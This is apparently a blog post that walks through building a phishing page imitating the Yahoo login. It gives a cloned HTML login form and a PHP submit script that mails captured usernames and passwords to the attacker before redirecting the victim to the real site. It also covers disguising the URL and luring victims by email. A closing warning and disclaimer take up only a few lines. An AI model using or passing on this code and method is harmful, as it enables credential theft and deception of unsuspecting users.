It’s quite easy to construct a bogus login page and steal password. Let’s look at the methods used to construct a fake login screen and how hackers steal your password.

Step 1: Create the fake login page

a) Take the print screen of the correct login page

b) Slice the web page using some tools like Photoshop

c) Save the file as HTML
d) Clean it up
e) Replace the main text box with our text box. Name it exactly as in the original. It will help to show the dropdown while they enter the address
f) Replace the form submit button
g) The code will look like this (don’t forget to add the design elements in between. Add CSS etc as needed)

<form method="post" action="submit.php">
<input name="username" type="text" size="15" maxlength="25" />
<input name="password" type="password" size="15" maxlength="25" />
<input name="Sign In" type="button" /></form>

Step 2: Add server side scripts to email the information and redirect to the correct login page 
a)    In submit.php write code like this
 
//extracting post
 
extract($_POST);
 
//making the email message
 
$message = "user name : ". $username."Password : ".$password;
 
// sending the email
 
mail('[email protected]', 'Hey here is the password', $message);
 
//you are done ...redirecting the user
 
header('Location: http://www.yahoo.com/');
 
?>
 
Step 3: Host them at a website
Host the website somewhere with some server side support like PHP, ASP, JSP etc.
 
Step 4: Name the URL so complicated such that user won’t notice it’s real or not
Name the login screen name like yahoo.com_mail_login.php?action=login&email=yes etc etc so that even if they look at the url, they don’t get suspicious
 
Step 5: Wait for the victim
Place this website as home page at the victim’s computer, send him the link through email etc and simply wait. If the user is not that tech savvy for sure he is gonna end up prey to the login screen hacking.
 
See how simple is it constructing and set up a fake login screen and steal the password. Beware of such scam and be cautious while entering the password. Always look for the correct domain name while entering the password. Internet explorer 8 onwards will highlight the correct URL in a different color compared to other strings in URL.
 
If you are on a shared computer beware, the attacker can write in the windows host file and even make the URL as mail.yahoo.com. (How? In another post)
 
Sample page : http://www.phishingsucks.110mb.com/ (Dont enter your real password)
 
Result page : http://phishingsucks.110mb.com/passwd.htm
 We don’t endorse hacking or spying, this article was written to show how easy is it to setup fake login screen and how much we have to care while entering passwords.